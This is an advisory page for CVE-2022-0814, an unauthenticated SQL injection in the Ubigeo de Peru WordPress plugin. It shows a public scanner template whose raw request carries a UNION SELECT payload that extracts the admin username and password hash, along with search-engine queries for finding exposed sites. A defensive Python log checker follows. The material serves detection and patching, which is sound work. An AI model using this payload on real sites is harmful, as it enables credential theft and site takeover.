CVE-2022-0814: Ubigeo de Peru < 3.6.4 - SQL Injection

Date: 2025-08-01 | Affected software: Ubigeo de Peru | PoC: public

Vulnerability description

The plugin does not properly sanitise and escape some parameters before using them in SQL statements via various AJAX actions, some of which are available to unauthenticated users, leading to SQL Injections.

PoC code [public]

id: CVE-2022-0814

info:
  name: Ubigeo de Peru < 3.6.4 - SQL Injection
  author: r3Y3r53
  severity: critical
  description: |
    The plugin does not properly sanitise and escape some parameters before using them in SQL statements via various AJAX actions, some of which are available to unauthenticated users, leading to SQL Injections.
  remediation: Fixed in version 3.6.4
  reference:
    - https://wpscan.com/vulnerability/fd84dc08-0079-4fcf-81c3-a61d652e3269
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0814
    - https://wordpress.org/plugins/ubigeo-peru/
    - https://github.com/cyllective/CVEs
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-0814
    cwe-id: CWE-89
    epss-score: 0.55564
    epss-percentile: 0.98006
    cpe: cpe:2.3:a:ubigeo_de_peru_para_woocommerce_project:ubigeo_de_peru_para_woocommerce:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: ubigeo_de_peru_para_woocommerce_project
    product: ubigeo_de_peru_para_woocommerce
    framework: wordpress
    shodan-query: http.html:/wp-content/plugins/ubigeo-peru/
    fofa-query: body=/wp-content/plugins/ubigeo-peru/
    publicwww-query: "/wp-content/plugins/ubigeo-peru/"
  tags: cve,cve2022,wordpress,wpscan,wp-plugin,sqli,ubigeo-peru,unauth,ubigeo_de_peru_para_woocommerce_project

http:
  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=rt_ubigeo_load_distritos_address&idProv=1%20UNION%20SELECT%201,(SELECT%20user_login%20FROM%20wp_users%20WHERE%20ID%20=%201),(SELECT%20user_pass%20FROM%20wp_users%20WHERE%20ID%20=%201)%20from%20wp_users#

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'idProv'
          - 'idDist'
          - 'distrito'
        condition: and

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 4a0a00473045022027840fec6bc80dec09f122732efc7cd91ae6573b1f63c54795622db9eb9c479a022100e685759332e88a9e5ca920ff9920134a3f9d3c818003158e9ae90709f9376e79:922c64590222798bb761d5b6d8e72950
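As an added example (not from the advisory, the template above or the plugin), a small Python checker that flags admin-ajax.php requests to the rt_ubigeo_load_distritos_address action whose ID parameters are not plain integers, which is what a legitimate province lookup sends. The record format it scans is a constructed assumption (a WAF or reverse-proxy log that keeps POST bodies), as is treating every parameter named id* as a numeric database ID.

```python
"""Flag admin-ajax.php requests to the ubigeo-peru AJAX action whose ID
parameters are not plain integers (CVE-2022-0814 pattern). Added example;
record format and the id* naming rule are assumptions, not plugin facts."""
import re
from typing import List, Optional, Tuple
from urllib.parse import parse_qs

# Action named in the advisory's PoC; extend with other rt_ubigeo_* actions you observe.
WATCHED_ACTIONS = {"rt_ubigeo_load_distritos_address"}
# Assumption: every parameter whose name starts with "id" carries a numeric ID.
ID_PARAM = re.compile(r"^id", re.IGNORECASE)
INTEGER = re.compile(r"^\d{1,10}$")


def check_request(path: str, body: str) -> Optional[str]:
    """Return a reason string for a suspicious request, or None if it looks benign."""
    if not path.endswith("/wp-admin/admin-ajax.php"):
        return None
    params = parse_qs(body, keep_blank_values=True)  # splits on '&' and percent-decodes
    actions = params.get("action", [])
    if not WATCHED_ACTIONS.intersection(actions):
        return None
    for name, values in params.items():
        if not ID_PARAM.match(name):
            continue
        for value in values:
            if not INTEGER.match(value.strip()):
                return f"non-numeric {name}={value!r} for action {actions[0]}"
    return None


def scan_log(lines: List[str]) -> List[Tuple[int, str]]:
    """Scan constructed records of the form 'TS METHOD PATH BODY'; return (line_no, reason)."""
    hits = []
    for n, line in enumerate(lines, 1):
        parts = line.split(" ", 3)
        if len(parts) < 4:
            continue  # no body recorded for this request
        _ts, _method, path, body = parts
        reason = check_request(path, body)
        if reason:
            hits.append((n, reason))
    return hits


# Constructed sample records (not real traffic); the third mirrors the advisory's PoC body.
SAMPLE_LOG = [
    "2025-08-01T10:00:01Z POST /wp-admin/admin-ajax.php action=rt_ubigeo_load_distritos_address&idProv=15",
    "2025-08-01T10:00:02Z POST /wp-admin/admin-ajax.php action=heartbeat&idProv=abc",
    "2025-08-01T10:00:03Z POST /wp-admin/admin-ajax.php action=rt_ubigeo_load_distritos_address&idProv=1%20UNION%20SELECT%201,2,3%23",
]

if __name__ == "__main__":
    for n, reason in scan_log(SAMPLE_LOG):
        print(f"line {n}: {reason}")
```

A hit here is a trigger to confirm the plugin version and upgrade to 3.6.4 or later; the check does not replace patching, since the vulnerable action is reachable without authentication.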